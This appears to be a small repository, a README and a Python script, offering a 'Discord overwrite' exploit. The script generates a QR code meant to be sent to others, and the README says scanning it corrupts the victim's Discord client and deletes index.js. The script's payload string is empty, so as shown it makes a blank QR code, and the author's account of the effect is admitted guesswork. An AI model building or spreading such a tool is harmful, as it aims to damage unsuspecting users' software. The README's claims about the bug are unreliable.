├── README.md └── bug.py /README.md: -------------------------------------------------------------------------------- 1 | # discord-overwrite 2 | Strange bug I found whilst testing some different aspects of discord. Enjoy :) 3 | 4 | 5 | ### How do I use it? 6 | 7 | Run the .py file and send the QR code wherever you want, when they scan it this strange bug will trigger. 8 | 9 | ### What does it do? 10 | 11 | If you refresh it basically soft-bricks your discord. You have to restart and install updates again. I seen it deletes index.js in discord_desktop_core 12 | 13 | ### How does it work 14 | 15 | My theory is that since this is an old feature, it is no longer supported and for some reason messes with your client?? Also it does not have to be in a qr code 16 | just for the record. 17 | -------------------------------------------------------------------------------- /bug.py: -------------------------------------------------------------------------------- 1 | # Title: Discord Overwrite / Corruption bug 2 | # Description: This bug forces the user to install updates again, randomly found bug and is a nice addition to my collection. I have been experimenting 3 | # Test 1 (RPC): Rich presence seems to get somewhat disabled until the user restartthe application (normal behaviour) 4 | # Test 2 (Multiple URI's): No new results after 3 tries, seems I may have gotten lucky with my update screen but hey! There is always a chance im missing something 5 | # Notes: I spent way too long finding this, please at least appreciate my effort! 6 | 7 | import requests 8 | import sys 9 | import qrcode 10 | import random 11 | 12 | class Exploit: 13 | 14 | def __init__(self): 15 | print("\033[31mGenerating payload!\033[0m") 16 | 17 | def execute(self): 18 | uri = "" 19 | filename = "MyNewQr{}.png".format(str(random.randint(1000,9000))) 20 | x = qrcode.make(uri) 21 | x.save(filename) 22 | print("Saved QR code to {}".format(filename)) 23 | print("\033[32mDone making payload, send image wherever you wish!\033[0m") 24 | 25 | 26 | def main(): 27 | exploit = Exploit() 28 | exploit.execute() 29 | 30 | if __name__ == '__main__': 31 | main() 32 | --------------------------------------------------------------------------------